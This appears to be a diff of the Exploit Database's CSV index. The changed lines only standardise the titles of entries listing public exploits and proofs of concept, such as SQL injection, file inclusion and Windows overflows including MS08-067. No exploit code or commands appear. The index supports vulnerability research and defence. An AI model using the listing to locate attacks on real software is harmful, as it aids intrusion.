 3992,platforms/php/webapps/3992.txt,"FlaP 1.0b (pachtofile) Remote File Inclusion Vulnerabilities",2007-05-25,"Mehmet Ince",php,webapps,0
-3993,platforms/windows/remote/3993.html,"IE 6 / Ademco, co., ltd. ATNBaseLoader100 Module Remote BoF Exploit",2007-05-26,rgod,windows,remote,0
+3993,platforms/windows/remote/3993.html,"Internet Explorer 6 / Ademco, co., ltd. ATNBaseLoader100 Module Remote BoF Exploit",2007-05-26,rgod,windows,remote,0
 3994,platforms/php/webapps/3994.txt,"Mazens PHP Chat V3 (basepath) - Remote File Inclusion Vulnerabilities",2007-05-26,"ThE TiGeR",php,webapps,0
 3995,platforms/php/webapps/3995.txt,"TROforum 0.1 (admin.php site_url) Remote File Inclusion Vulnerability",2007-05-26,"Mehmet Ince",php,webapps,0
 3996,platforms/windows/remote/3996.c,"Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)",2007-05-26,fabio/b0x,windows,remote,80
@@ -3673,7 +3673,7 @@ id,file,description,date,author,platform,type,port
 4020,platforms/php/webapps/4020.php,"RevokeBB <= 1.0 RC4 - Blind SQL Injection / Hash Retrieve Exploit",2007-06-01,BlackHawk,php,webapps,0
 4021,platforms/windows/remote/4021.html,"Zenturi ProgramChecker ActiveX (sasatl.dll) Remote BoF Exploit",2007-06-01,shinnai,windows,remote,0
 4022,platforms/php/webapps/4022.htm,"XOOPS Module icontent 1.0/4.5 - Remote File Inclusion Exploit",2007-06-01,GoLd_M,php,webapps,0
-4023,platforms/windows/remote/4023.html,"IE6 / Provideo Camimage (ISSCamControl.dll 1.0.1.5) Remote BoF Exploit",2007-06-02,rgod,windows,remote,0
+4023,platforms/windows/remote/4023.html,"Internet Explorer 6 / Provideo Camimage (ISSCamControl.dll 1.0.1.5) Remote BoF Exploit",2007-06-02,rgod,windows,remote,0
 4024,platforms/windows/local/4024.rb,"DVD X Player 4.1 Professional .PLF file Buffer Overflow Exploit",2007-06-02,n00b,windows,local,0
 4025,platforms/php/webapps/4025.php,"Quick.Cart <= 2.2 RFI/LFI Remote Code Execution Exploit",2007-06-02,Kacper,php,webapps,0
 4026,platforms/php/webapps/4026.php,"PNphpBB2 <= 1.2 - (index.php c) Remote SQL Injection Exploit",2007-06-03,Kacper,php,webapps,0
@@ -3981,7 +3981,7 @@ id,file,description,date,author,platform,type,port
 4334,platforms/windows/remote/4334.txt,"MSN messenger 7.x (8.0?) VIDEO Remote Heap Overflow Exploit",2007-08-29,wushi,windows,remote,0
 4335,platforms/windows/dos/4335.txt,"Yahoo! Messenger 8.1.0.413 (webcam) Remote Crash Exploit",2007-08-29,wushi,windows,dos,0
 4336,platforms/php/webapps/4336.txt,"xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability",2007-08-29,DarkFuneral,php,webapps,0
-4337,platforms/windows/dos/4337.c,"MS Windows (GDI32.DLL) Denial of Service Exploit (MS07-046)",2007-08-29,"Gil-Dong / Woo-Chi",windows,dos,0
+4337,platforms/windows/dos/4337.c,"MS Windows - (GDI32.DLL) Denial of Service Exploit (MS07-046)",2007-08-29,"Gil-Dong / Woo-Chi",windows,dos,0
 4338,platforms/php/webapps/4338.pl,"ABC estore 3.0 (cat_id) Remote Blind SQL Injection Exploit",2007-08-29,k1tk4t,php,webapps,0
 4339,platforms/php/webapps/4339.txt,"PHPNS 1.1 (shownews.php id) Remote SQL Injection Vulnerability",2007-08-29,SmOk3,php,webapps,0
 4340,platforms/php/webapps/4340.txt,"phpBG 0.9.1 (rootdir) Remote File Inclusion Vulnerabilities",2007-08-29,GoLd_M,php,webapps,0
@@ -4227,7 +4227,7 @@ id,file,description,date,author,platform,type,port
 4581,platforms/php/webapps/4581.txt,"Sige 0.1 sige_init.php Remote File Inclusion Vulnerability",2007-10-28,GoLd_M,php,webapps,0
 4582,platforms/php/webapps/4582.txt,"teatro 1.6 (basePath) Remote File Include Vulnerability",2007-10-28,"Alkomandoz Hacker",php,webapps,0
 4583,platforms/windows/local/4583.py,"Sony CONNECT Player 4.x (m3u File) Local Stack Overflow Exploit",2007-10-29,TaMBaRuS,windows,local,0
-4584,platforms/windows/local/4584.c,"Kodak Image Viewer TIF/TIFF Code Execution Exploit PoC (MS07-055)",2007-10-29,"Gil-Dong / Woo-Chi",windows,local,0
+4584,platforms/windows/local/4584.c,"Kodak Image Viewer -TIF/TIFF Code Execution Exploit PoC (MS07-055)",2007-10-29,"Gil-Dong / Woo-Chi",windows,local,0
 4585,platforms/php/webapps/4585.txt,"MySpace Resource Script (MSRS) 1.21 RFI Vulnerability",2007-10-29,r00t@zapak.com,php,webapps,0
 4586,platforms/php/webapps/4586.txt,"ProfileCMS 1.0 - Remote File Upload Vulnerability Shell Upload Exploit",2007-10-29,r00t@zapak.com,php,webapps,0
 4587,platforms/php/webapps/4587.txt,"miniBB 2.1 (table) Remote SQL Injection Vulnerability",2007-10-30,irk4z,php,webapps,0
@@ -4258,7 +4258,7 @@ id,file,description,date,author,platform,type,port
 4613,platforms/windows/dos/4613.html,"Adobe Shockwave ShockwaveVersion() Stack Overflow PoC",2007-11-08,Elazar,windows,dos,0
 4614,platforms/php/webapps/4614.txt,"jPORTAL <= 2.3.1 articles.php Remote SQL Injection Vulnerability",2007-11-09,Alexsize,php,webapps,0
 4615,platforms/multiple/dos/4615.txt,"MySQL <= 5.0.45 (Alter) Denial of Service Vulnerability",2007-11-09,"Kristian Hermansen",multiple,dos,0
-4616,platforms/windows/remote/4616.pl,"Microsoft Internet Explorer TIF/TIFF Code Execution (MS07-055)",2007-11-11,grabarz,windows,remote,0
+4616,platforms/windows/remote/4616.pl,"Microsoft Internet Explorer - TIF/TIFF Code Execution (MS07-055)",2007-11-11,grabarz,windows,remote,0
 4617,platforms/php/webapps/4617.txt,"Softbiz Auctions Script product_desc.php Remote SQL Injection Vuln",2007-11-11,IRCRASH,php,webapps,0
 4618,platforms/php/webapps/4618.txt,"Softbiz Ad Management plus Script ver 1 Remote SQL Injection Vuln",2007-11-11,IRCRASH,php,webapps,0
 4619,platforms/php/webapps/4619.txt,"Softbiz Banner Exchange Network Script 1.0 - SQL Injection Vulnerability",2007-11-11,IRCRASH,php,webapps,0
@@ -4387,7 +4387,7 @@ id,file,description,date,author,platform,type,port
 4742,platforms/windows/dos/4742.py,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow PoC",2007-12-18,r4x,windows,dos,0
 4743,platforms/php/webapps/4743.pl,"FreeWebshop <= 2.2.7 (cookie) Admin Password Grabber Exploit",2007-12-18,k1tk4t,php,webapps,0
 4744,platforms/hardware/remote/4744.txt,"rooter VDSL Device (Goahead WEBSERVER) Disclosure Vulnerability",2007-12-18,NeoCoderz,hardware,remote,0
-4745,platforms/windows/remote/4745.cpp,"MS Windows Message Queuing Service RPC BOF Exploit (MS07-065)",2007-12-18,axis,windows,remote,0
+4745,platforms/windows/remote/4745.cpp,"MS Windows Message Queuing Service - RPC BOF Exploit (MS07-065)",2007-12-18,axis,windows,remote,0
 4746,platforms/windows/remote/4746.html,"RavWare Software MAS Flic Control Remote Buffer Overflow Exploit",2007-12-18,shinnai,windows,remote,0
 4747,platforms/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 (ulang) Remote Command Execution Exploit",2007-12-18,rgod,windows,remote,0
 4748,platforms/windows/dos/4748.php,"SurgeMail v.38k4 webmail Host header Denial of Service Exploit",2007-12-18,rgod,windows,dos,0
@@ -4401,7 +4401,7 @@ id,file,description,date,author,platform,type,port
 4757,platforms/windows/dos/4757.txt,"hp software update client 3.0.8.4 - Multiple Vulnerabilities",2007-12-19,porkythepig,windows,dos,0
 4758,platforms/php/webapps/4758.txt,"xeCMS 1.x (view.php list) Remote File Disclosure Vulnerability",2007-12-19,p4imi0,php,webapps,0
 4759,platforms/osx/local/4759.c,"Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit",2007-12-19,"Subreption LLC.",osx,local,0
-4760,platforms/windows/remote/4760.txt,"MS Windows 2000 AS SP4 Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0
+4760,platforms/windows/remote/4760.txt,"MS Windows 2000 AS SP4 - Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0
 4761,platforms/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Root Exploit",2007-12-21,eliteboy,multiple,remote,25
 4762,platforms/php/webapps/4762.txt,"nicLOR CMS (sezione_news.php) Remote SQL Injection Vulnerability",2007-12-21,x0kster,php,webapps,0
 4763,platforms/php/webapps/4763.txt,"NmnNewsletter 1.0.7 (output) Remote File Inclusion Vulnerability",2007-12-21,CraCkEr,php,webapps,0
@@ -4742,7 +4742,7 @@ id,file,description,date,author,platform,type,port
 5104,platforms/php/webapps/5104.txt,"Joomla Component pcchess <= 0.8 - Remote SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0
 5105,platforms/php/webapps/5105.pl,"AuraCMS 2.2 (gallery_data.php) Remote SQL Injection Exploit",2008-02-12,DNX,php,webapps,0
 5106,platforms/windows/remote/5106.html,"Citrix Presentation Server Client WFICA.OCX ActiveX - Heap BOF Exploit",2008-02-12,Elazar,windows,remote,0
-5107,platforms/windows/local/5107.c,"Microsoft Office .WPS File Stack Overflow Exploit (MS08-011)",2008-02-13,chujwamwdupe,windows,local,0
+5107,platforms/windows/local/5107.c,"Microsoft Office 2003 - .WPS File Stack Overflow Exploit (MS08-011)",2008-02-13,chujwamwdupe,windows,local,0
 5108,platforms/php/webapps/5108.txt,"Affiliate Market 0.1 BETA - (language) Local File Inclusion Vulnerability",2008-02-13,GoLd_M,php,webapps,0
 5109,platforms/php/webapps/5109.txt,"Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability",2008-02-13,S@BUN,php,webapps,0
 5110,platforms/windows/dos/5110.txt,"QuickTime 7.4.1 QTPlugin.ocx Multiple Stack Overflow Vulnerabilities",2008-02-13,"laurent gaffié ",windows,dos,0
@@ -4918,7 +4918,7 @@ id,file,description,date,author,platform,type,port
 5283,platforms/linux/remote/5283.txt,"CenterIM <= 4.22.3 - Remote Command Execution Vulnerability",2008-03-20,"Brian Fonfara",linux,remote,0
 5285,platforms/php/webapps/5285.txt,"RunCMS Module section (artid) Remote SQL Injection Vulnerability",2008-03-20,Cr@zy_King,php,webapps,0
 5286,platforms/php/webapps/5286.txt,"ASPapp Knowledge Base Remote SQL Injection Vulnerability",2008-03-20,xcorpitx,php,webapps,0
-5287,platforms/windows/local/5287.txt,"Microsoft Office Excel Code Execution Exploit (MS08-014)",2008-03-21,zha0,windows,local,0
+5287,platforms/windows/local/5287.txt,"Microsoft Office Excel - Code Execution Exploit (MS08-014)",2008-03-21,zha0,windows,local,0
 5288,platforms/php/webapps/5288.txt,"phpAddressBook 2.11 Multiple Local File Inclusion Vulnerabilities",2008-03-21,0x90,php,webapps,0
 5289,platforms/hardware/remote/5289.txt,"ZyXEL ZyWALL Quagga/Zebra (default pass) Remote Root Vulnerability",2008-03-21,"Pranav Joshi",hardware,remote,0
 5290,platforms/php/webapps/5290.txt,"RunCMS Module Photo 3.02 (cid) Remote SQL Injection Vulnerability",2008-03-21,S@BUN,php,webapps,0
@@ -4951,7 +4951,7 @@ id,file,description,date,author,platform,type,port
 5317,platforms/php/webapps/5317.txt,"JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities",2008-03-26,CraCkEr,php,webapps,0
 5318,platforms/php/webapps/5318.txt,"Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability",2008-03-28,parad0x,php,webapps,0
 5319,platforms/php/webapps/5319.pl,"AuraCMS 2.x (user.php) Security Code Bypass / Add Administrator Exploit",2008-03-28,NTOS-Team,php,webapps,0
-5320,platforms/windows/local/5320.txt,"Microsoft Office XP SP3 PPT File Buffer Overflow Exploit (ms08-016)",2008-03-30,Marsu,windows,local,0
+5320,platforms/windows/local/5320.txt,"Microsoft Office XP SP3 - PPT File Buffer Overflow Exploit (MS08-016)",2008-03-30,Marsu,windows,local,0
 5321,platforms/windows/dos/5321.txt,"Visual Basic (vbe6.dll) Local Stack Overflow PoC / DoS",2008-03-30,Marsu,windows,dos,0
 5322,platforms/php/webapps/5322.txt,"Smoothflash (admin_view_image.php cid) SQL Injection Vulnerability",2008-03-30,S@BUN,php,webapps,0
 5323,platforms/php/webapps/5323.pl,"mxBB Module mx_blogs 2.0.0-beta Remote File Inclusion Exploit",2008-03-30,bd0rk,php,webapps,0
@@ -5072,7 +5072,7 @@ id,file,description,date,author,platform,type,port
 5439,platforms/php/webapps/5439.txt,"PostCard 1.0 - Remote Insecure Cookie Handling Vulnerability",2008-04-13,t0pP8uZz,php,webapps,0
 5440,platforms/php/webapps/5440.php,"Mumbo Jumbo Media OP4 Remote Blind SQL Injection Exploit",2008-04-13,Lidloses_Auge,php,webapps,0
 5441,platforms/php/webapps/5441.txt,"SmallBiz 4 Seasons CMS Remote SQL Injection Vulnerability",2008-04-14,cO2,php,webapps,0
-5442,platforms/windows/local/5442.cpp,"MS Windows GDI Image Parsing Stack Overflow Exploit (MS08-021)",2008-04-14,Lamhtz,windows,local,0
+5442,platforms/windows/local/5442.cpp,"MS Windows GDI - Image Parsing Stack Overflow Exploit (MS08-021)",2008-04-14,Lamhtz,windows,local,0
 5443,platforms/php/webapps/5443.txt,"SmallBiz eShop (content_id) Remote SQL Injection Vulnerability",2008-04-14,Stack,php,webapps,0
 5444,platforms/php/webapps/5444.txt,"BosClassifieds 3.0 (index.php cat) SQL Injection Vulnerability",2008-04-14,"SoSo H H",php,webapps,0
 5445,platforms/windows/remote/5445.cpp,"HP OpenView NNM 7.5.1 - ovalarmsrv.exe Remote Overflow Exploit",2008-04-14,Heretic2,windows,remote,2954
@@ -5148,7 +5148,7 @@ id,file,description,date,author,platform,type,port
 5515,platforms/windows/dos/5515.txt,"GroupWise 7.0 (mailto: scheme) Buffer Overflow PoC",2008-04-28,"Juan Yacubian",windows,dos,0
 5516,platforms/php/webapps/5516.txt,"Prozilla Hosting Index (directory.php cat_id) - SQL Injection Vulnerability",2008-04-28,K-159,php,webapps,0
 5517,platforms/php/webapps/5517.txt,"Softbiz Web Host Directory Script (host_id) - SQL Injection Vulnerability",2008-04-28,K-159,php,webapps,0
-5518,platforms/windows/local/5518.txt,"MS Windows XP SP2 (win32k.sys) Privilege Escalation Exploit (MS08-025)",2008-04-28,"Ruben Santamarta ",windows,local,0
+5518,platforms/windows/local/5518.txt,"MS Windows XP SP2 - (win32k.sys) Privilege Escalation Exploit (MS08-025)",2008-04-28,"Ruben Santamarta ",windows,local,0
 5519,platforms/windows/remote/5519.c,"VLC 0.8.6d - httpd_FileCallBack Remote Format String Exploit",2008-04-28,EpiBite,windows,remote,0
 5520,platforms/php/webapps/5520.txt,"Joovili 3.1 (browse.videos.php category) SQL Injection Vulnerability",2008-04-28,HaCkeR_EgY,php,webapps,0
 5521,platforms/php/webapps/5521.txt,"SugarCRM Community Edition 4.5.1/5.0.0 File Disclosure Vulnerability",2008-04-29,"Roberto Suggi Liverani",php,webapps,0
@@ -6027,7 +6027,7 @@ id,file,description,date,author,platform,type,port
 6451,platforms/php/webapps/6451.txt,"Talkback 2.3.6 - Multiple Local File Inclusion/PHPInfo Disclosure Vulns",2008-09-13,SirGod,php,webapps,0
 6452,platforms/php/webapps/6452.txt,"phpsmartcom 0.2 (lfi/sql) Multiple Vulnerabilities",2008-09-13,r3dm0v3,php,webapps,0
 6453,platforms/asp/webapps/6453.txt,"FoT Video scripti 1.1b (oyun) Remote SQL Injection Vulnerability",2008-09-13,Crackers_Child,asp,webapps,0
-6454,platforms/windows/remote/6454.html,"Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)",2008-09-13,haluznik,windows,remote,0
+6454,platforms/windows/remote/6454.html,"Windows Media Encoder XP SP2 - wmex.dll ActiveX BOF Exploit (MS08-053)",2008-09-13,haluznik,windows,remote,0
 6455,platforms/php/webapps/6455.txt,"Linkarity (link.php) Remote SQL Injection Vulnerability",2008-09-13,"Egypt Coder",php,webapps,0
 6456,platforms/php/webapps/6456.txt,"Free PHP VX Guestbook 1.06 Arbitrary Database Backup Vulnerability",2008-09-13,SirGod,php,webapps,0
 6457,platforms/php/webapps/6457.txt,"Free PHP VX Guestbook 1.06 Insecure Cookie Handling Vulnerability",2008-09-14,Stack,php,webapps,0
@@ -6224,7 +6224,7 @@ id,file,description,date,author,platform,type,port
 6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 (infile) Local File Inclusion Vulnerability",2008-10-02,ZeN,php,webapps,0
 6654,platforms/windows/dos/6654.pl,"mIRC 6.34 Remote Buffer Overflow PoC",2008-10-02,securfrog,windows,dos,0
 6655,platforms/php/webapps/6655.php,"OpenX 2.6 (ac.php bannerid) Remote Blind SQL Injection Exploit",2008-10-02,d00m3r4ng,php,webapps,0
-6656,platforms/windows/remote/6656.txt,"MS Windows GDI (EMR_COLORMATCHTOTARGETW) Exploit MS08-021",2008-10-02,Ac!dDrop,windows,remote,0
+6656,platforms/windows/remote/6656.txt,"MS Windows GDI - (EMR_COLORMATCHTOTARGETW) Exploit (MS08-021)",2008-10-02,Ac!dDrop,windows,remote,0
 6657,platforms/php/webapps/6657.pl,"IP Reg <= 0.4 - Remote Blind SQL Injection Exploit",2008-10-03,StAkeR,php,webapps,0
 6658,platforms/windows/dos/6658.txt,"VBA32 Personal Antivirus 3.12.8.x (malformed archive) DoS Exploit",2008-10-03,LiquidWorm,windows,dos,0
 6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script (arsaprint.php id) SQL Injection Vulnerability",2008-10-03,"Hussin X",php,webapps,0
@@ -6297,7 +6297,7 @@ id,file,description,date,author,platform,type,port
 6729,platforms/php/webapps/6729.php,"SlimCMS <= 1.0.0 (redirect.php) Privilege Escalation Exploit",2008-10-10,StAkeR,php,webapps,0
 6730,platforms/php/webapps/6730.txt,"Joomla Component ownbiblio 1.5.3 (catid) SQL Injection Vulnerability",2008-10-11,H!tm@N,php,webapps,0
 6731,platforms/asp/webapps/6731.txt,"Absolute Poll Manager XE 4.1 (xlacomments.asp) SQL Injection Vuln",2008-10-11,Hakxer,asp,webapps,0
-6732,platforms/windows/dos/6732.txt,"MS Windows InternalOpenColorProfile Heap Overflow PoC (MS08-046)",2008-10-12,Ac!dDrop,windows,dos,0
+6732,platforms/windows/dos/6732.txt,"MS Windows - InternalOpenColorProfile Heap Overflow PoC (MS08-046)",2008-10-12,Ac!dDrop,windows,dos,0
 6733,platforms/php/webapps/6733.txt,"mini-pub 0.3 (lfd/ce) Multiple Vulnerabilities",2008-10-12,muuratsalo,php,webapps,0
 6734,platforms/php/webapps/6734.txt,"mini-pub 0.3 - Local Directory Traversal / File Disclosure Vulnerabilities",2008-10-12,GoLd_M,php,webapps,0
 6735,platforms/php/webapps/6735.php,"Globsy <= 1.0 - Remote File Rewriting Exploit",2008-10-12,StAkeR,php,webapps,0
@@ -6387,7 +6387,7 @@ id,file,description,date,author,platform,type,port
 6821,platforms/php/webapps/6821.txt,"miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities",2008-10-23,StAkeR,php,webapps,0
 6822,platforms/php/webapps/6822.txt,"websvn <= 2.0 (xss/fh/ce) Multiple Vulnerabilities",2008-10-23,"GulfTech Security",php,webapps,0
 6823,platforms/php/webapps/6823.txt,"siteengine 5.x Multiple Vulnerabilities",2008-10-23,xy7,php,webapps,0
-6824,platforms/windows/dos/6824.txt,"MS Windows Server Service Code Execution PoC (MS08-067)",2008-10-23,"stephen lawler",windows,dos,0
+6824,platforms/windows/dos/6824.txt,"MS Windows Server Service - Code Execution PoC (MS08-067)",2008-10-23,"stephen lawler",windows,dos,0
 6825,platforms/windows/local/6825.pl,"VLC 0.9.4 .TY File Buffer Overflow Exploit (SEH)",2008-10-23,"Guido Landi",windows,local,0
 6826,platforms/php/webapps/6826.txt,"joomla component archaic binary gallery 0.2 - Directory Traversal vuln",2008-10-24,H!tm@N,php,webapps,0
 6827,platforms/php/webapps/6827.txt,"Joomla Component Kbase 1.0 - Remote SQL Injection Vulnerability",2008-10-24,H!tm@N,php,webapps,0
@@ -6404,7 +6404,7 @@ id,file,description,date,author,platform,type,port
 6838,platforms/windows/dos/6838.rb,"PumpKIN TFTP Server 2.7.2.0 - Denial of Service Exploit (meta)",2008-10-25,"Saint Patrick",windows,dos,0
 6839,platforms/php/webapps/6839.txt,"PozScripts Classified Auctions (gotourl.php id) SQL Injection Vuln",2008-10-26,"Hussin X",php,webapps,0
 6840,platforms/windows/remote/6840.html,"PowerTCP FTP module Multiple Technique Exploit (SEH/HeapSpray)",2008-10-26,"Shahriyar Jalayeri",windows,remote,0
-6841,platforms/windows/remote/6841.txt,"MS Windows Server Service Code Execution Exploit (MS08-067) (Univ)",2008-10-26,EMM,windows,remote,135
+6841,platforms/windows/remote/6841.txt,"MS Windows Server Service - Code Execution Exploit (MS08-067) (Univ)",2008-10-26,EMM,windows,remote,135
 6842,platforms/php/webapps/6842.txt,"WordPress Media Holder (mediaHolder.php id) SQL Injection Vuln",2008-10-26,boom3rang,php,webapps,0
 6843,platforms/php/webapps/6843.txt,"SFS Ez Forum (forum.php id) SQL Injection Vulnerability",2008-10-26,Hurley,php,webapps,0
 6844,platforms/php/webapps/6844.pl,"MyForum 1.3 (lecture.php id) Remote SQL Injection Exploit",2008-10-26,Vrs-hCk,php,webapps,0
@@ -6742,7 +6742,7 @@ id,file,description,date,author,platform,type,port
 7190,platforms/php/webapps/7190.txt,"Ez Ringtone Manager Multiple Remote File Disclosure Vulnerabilities",2008-11-22,b3hz4d,php,webapps,0
 7191,platforms/php/webapps/7191.php,"LoveCMS 1.6.2 Final (Simple Forum 3.1d) Change Admin Password Exploit",2008-11-22,cOndemned,php,webapps,0
 7195,platforms/php/webapps/7195.txt,"Prozilla Hosting Index (id) Remote SQL Injection Vulnerability",2008-11-23,snakespc,php,webapps,0
-7196,platforms/windows/remote/7196.html,"Microsoft XML Core Services DTD Cross-Domain Scripting PoC MS08-069",2008-11-23,"Jerome Athias",windows,remote,0
+7196,platforms/windows/remote/7196.html,"Microsoft XML Core Services DTD - Cross-Domain Scripting PoC (MS08-069)",2008-11-23,"Jerome Athias",windows,remote,0
 7197,platforms/php/webapps/7197.txt,"Goople Cms 1.7 - Remote File Upload Vulnerability",2008-11-23,x0r,php,webapps,0
 7198,platforms/php/webapps/7198.txt,"NetArtMedia Cars Portal 2.0 (image.php id) SQL Injection Vulnerability",2008-11-23,snakespc,php,webapps,0
 7199,platforms/php/webapps/7199.txt,"NetArtMedia Blog System (image.php id) SQL Injection Vulnerability",2008-11-23,snakespc,php,webapps,0
@@ -7602,10 +7602,10 @@ id,file,description,date,author,platform,type,port
 8074,platforms/multiple/local/8074.rb,"Oracle 10g MDSYS.SDO_TOPO_DROP_FTBL SQL Injection Exploit (meta)",2009-02-18,sh2kerr,multiple,local,0
 8075,platforms/php/webapps/8075.pl,"Firepack (admin/ref.php) Remote Code Execution Exploit",2009-02-18,Lidloses_Auge,php,webapps,0
 8076,platforms/php/webapps/8076.txt,"smNews 1.0 Auth Bypass/Column Truncation Vulnerabilities",2009-02-18,x0r,php,webapps,0
-8077,platforms/windows/dos/8077.html,"MS Internet Explorer 7 Memory Corruption PoC (MS09-002)",2009-02-18,N/A,windows,dos,0
-8079,platforms/windows/remote/8079.html,"MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) (xp sp2)",2009-02-20,Abysssec,windows,remote,0
-8080,platforms/windows/remote/8080.py,"MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) (py)",2009-02-20,"David Kennedy (ReL1K)",windows,remote,0
-8082,platforms/windows/remote/8082.html,"MS Internet Explorer 7 Memory Corruption PoC (MS09-002) (win2k3sp2)",2009-02-20,webDEViL,windows,remote,0
+8077,platforms/windows/dos/8077.html,"MS Internet Explorer 7 - Memory Corruption PoC (MS09-002)",2009-02-18,N/A,windows,dos,0
+8079,platforms/windows/remote/8079.html,"MS Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (XP SP2)",2009-02-20,Abysssec,windows,remote,0
+8080,platforms/windows/remote/8080.py,"MS Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (py)",2009-02-20,"David Kennedy (ReL1K)",windows,remote,0
+8082,platforms/windows/remote/8082.html,"MS Internet Explorer 7 - Memory Corruption PoC (MS09-002) (win2k3sp2)",2009-02-20,webDEViL,windows,remote,0
 8083,platforms/php/webapps/8083.txt,"phpBB 3 (autopost bot mod <= 0.1.3) Remote File Include Vulnerability",2009-02-20,Kacper,php,webapps,0
 8084,platforms/windows/dos/8084.pl,"Got All Media 7.0.0.3 (t00t) Remote Denial of Service Exploit",2009-02-20,LiquidWorm,windows,dos,0
 8085,platforms/cgi/webapps/8085.txt,"i-dreams Mailer 1.2 Final (admin.dat) File Disclosure Vulnerability",2009-02-20,Pouya_Server,cgi,webapps,0
@@ -7670,7 +7670,7 @@ id,file,description,date,author,platform,type,port
 8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server - (CSRF) Change Admin Pass Vulnerability",2009-03-03,Stack,windows,remote,0
 8150,platforms/php/webapps/8150.txt,"NovaBoard <= 1.0.1 (message) Persistent XSS Vulnerability",2009-03-03,Pepelux,php,webapps,0
 8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability",2009-03-03,kecemplungkalen,php,webapps,0
-8152,platforms/windows/remote/8152.py,"MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) (fast)",2009-03-04,"Ahmed Obied",windows,remote,0
+8152,platforms/windows/remote/8152.py,"MS Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (Fast)",2009-03-04,"Ahmed Obied",windows,remote,0
 8154,platforms/windows/remote/8154.pl,"EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (pl)",2009-03-04,Dr4sH,windows,remote,80
 8155,platforms/windows/remote/8155.txt,"Easy File Sharing Web Server 4.8 File Disclosure Vulnerability",2009-03-04,Stack,windows,remote,0
 8156,platforms/windows/dos/8156.txt,"Easy Web Password 1.2 - Local Heap Memory Consumption PoC",2009-03-04,Stack,windows,dos,0
@@ -9165,7 +9165,7 @@ id,file,description,date,author,platform,type,port
 9706,platforms/php/webapps/9706.txt,"joomla component com_album 1.14 - Directory Traversal vulnerability",2009-09-17,DreamTurk,php,webapps,0
 9707,platforms/windows/dos/9707.pl,"Ease Audio Cutter 1.20 (.wav file) Local Crash PoC",2009-09-17,zAx,windows,dos,0
 9708,platforms/php/webapps/9708.txt,"OpenSiteAdmin 0.9.7b (pageHeader.php path) RFI Vulnerability",2009-09-17,"EA Ngel",php,webapps,0
-9709,platforms/linux/local/9709.txt,"Changetrack 4.3-3 Local Privilege Escalation Vulnerability",2009-09-17,Rick,linux,local,0
+9709,platforms/linux/local/9709.txt,"Changetrack 4.3-3 - Local Privilege Escalation Vulnerability",2009-09-17,Rick,linux,local,0
 9710,platforms/php/webapps/9710.txt,"CF Shopkart 5.3x (itemid) Remote SQL Injection Vulnerability",2009-09-17,"learn3r hacker",php,webapps,0
 9711,platforms/php/webapps/9711.txt,"FMyClone 2.3 - Multiple SQL Injection Vulnerabilities",2009-09-17,"learn3r hacker",php,webapps,0
 9712,platforms/php/webapps/9712.txt,"Nephp Publisher Enterprise 4.5 (Auth Bypass) SQL Injection Vulnerability",2009-09-17,"learn3r hacker",php,webapps,0
@@ -10222,7 +10222,7 @@ id,file,description,date,author,platform,type,port
 11148,platforms/php/webapps/11148.txt,"PonVFTP Bypass and Shell Upload Vulnerability",2010-01-15,S2K9,php,webapps,0
 11149,platforms/windows/dos/11149.c,"Sub Station Alpha 4.08 - (.rt) Local Buffer Overflow PoC",2010-01-15,"fl0 fl0w",windows,dos,0
 11150,platforms/windows/dos/11150.txt,"Aqua Real 1.0 & 2.0 - Local Crash PoC",2010-01-15,R3d-D3V!L,windows,dos,0
-11151,platforms/windows/remote/11151.html,"IE wshom.ocx ActiveX Control Remote Code Execution",2010-01-16,"germaya_x and D3V!L FUCKER",windows,remote,0
+11151,platforms/windows/remote/11151.html,"Internet Explorer wshom.ocx ActiveX Control Remote Code Execution",2010-01-16,"germaya_x and D3V!L FUCKER",windows,remote,0
 11152,platforms/windows/local/11152.py,"Google SketchUp <= 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,windows,local,0
 11154,platforms/windows/local/11154.py,"BS.Player 2.51 - Universal SEH Overflow Exploit",2010-01-16,Dz_attacker,windows,local,0
 11155,platforms/php/webapps/11155.txt,"Transload Script Upload Vulnerability",2010-01-16,DigitALL,php,webapps,0
@@ -10288,7 +10288,7 @@ id,file,description,date,author,platform,type,port
 11226,platforms/php/webapps/11226.txt,"Joomla Component com_biographies SQL injection Vulnerability",2010-01-22,snakespc,php,webapps,0
 11227,platforms/windows/dos/11227.pl,"yPlay 1.0.76 (.mp3) Local Crash PoC",2010-01-22,"cr4wl3r ",windows,dos,0
 11228,platforms/windows/dos/11228.pl,"Pico MP3 Player 1.0 (.mp3 /.pls File) Local Crash PoC",2010-01-22,"cr4wl3r ",windows,dos,0
-11229,platforms/windows/local/11229.txt,"IE wshom.ocx (Run) ActiveX Remote Code Execution (add admin user)",2010-01-22,Stack,windows,local,0
+11229,platforms/windows/local/11229.txt,"Internet Explorer wshom.ocx (Run) ActiveX Remote Code Execution (add admin user)",2010-01-22,Stack,windows,local,0
 11232,platforms/windows/local/11232.c,"Authentium SafeCentral <= 2.6 shdrv.sys local kernel ring0 SYSTEM exploit",2010-01-22,mu-b,windows,local,0
